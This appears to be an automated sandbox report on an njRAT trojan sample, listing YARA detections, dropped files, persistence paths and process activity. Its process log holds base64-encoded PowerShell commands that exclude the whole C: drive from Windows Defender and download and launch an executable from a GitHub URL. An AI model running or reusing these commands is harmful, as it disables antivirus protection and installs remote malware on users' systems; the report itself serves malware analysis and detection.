Source: Yara match File source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3915823242.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: virus.exe.bin.exe PID: 752, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Hyra.exe PID: 1952, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: final.exe PID: 3320, type: MEMORYSTR
Source: Yara match File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED

Operating System Destruction

Source: C:\Users\user\AppData\Roaming\dllhost.exe Process information set: 01 00 00 00

System Summary

Source: virus.exe.bin.exe, type: SAMPLE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: virus.exe.bin.exe, type: SAMPLE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: virus.exe.bin.exe, type: SAMPLE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: virus.exe.bin.exe, type: SAMPLE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1619630469.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0000000F.00000002.1619630469.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000F.00000002.1619630469.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\ClickMe.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\ClickMe.exe, type: DROPPED Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\ClickMe.exe, type: DROPPED Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\ClickMe.exe, type: DROPPED Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\ClickMe.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\ClickMe.exe, type: DROPPED Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\ClickMe.exe, type: DROPPED Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Users\user\AppData\Roaming\dllhost.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Code function: 15_2_00A7AF02 NtQuerySystemInformation, 15_2_00A7AF02
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Code function: 15_2_00A7AED1 NtQuerySystemInformation, 15_2_00A7AED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 20_2_006BBC72 NtSetInformationProcess, 20_2_006BBC72
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 20_2_006BAF02 NtQuerySystemInformation, 20_2_006BAF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 20_2_006BAED1 NtQuerySystemInformation, 20_2_006BAED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 20_2_006BBC50 NtSetInformationProcess, 20_2_006BBC50
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 24_2_00A5AF02 NtQuerySystemInformation, 24_2_00A5AF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 24_2_00A5AED1 NtQuerySystemInformation, 24_2_00A5AED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 25_2_00D3AF02 NtQuerySystemInformation, 25_2_00D3AF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 25_2_00D3AED1 NtQuerySystemInformation, 25_2_00D3AED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 26_2_0095AF02 NtQuerySystemInformation, 26_2_0095AF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe Code function: 26_2_0095AED1 NtQuerySystemInformation, 26_2_0095AED1
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Code function: 15_2_00E60EC0 15_2_00E60EC0
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Code function: 15_2_00E615B3 15_2_00E615B3
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Code function: 15_2_00E61600 15_2_00E61600
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Code function: 15_2_00E60E90 15_2_00E60E90
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Code function: 16_2_00C4C1B8 16_2_00C4C1B8
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Code function: 16_2_064E8EE8 16_2_064E8EE8
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Code function: 16_2_078F09E0 16_2_078F09E0
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Code function: 16_2_0797CB40 16_2_0797CB40
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Code function: 16_2_07977808 16_2_07977808
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Code function: 16_2_079777F9 16_2_079777F9
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Code function: 16_2_07976738 16_2_07976738
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Code function: 16_2_0797C4A2 16_2_0797C4A2
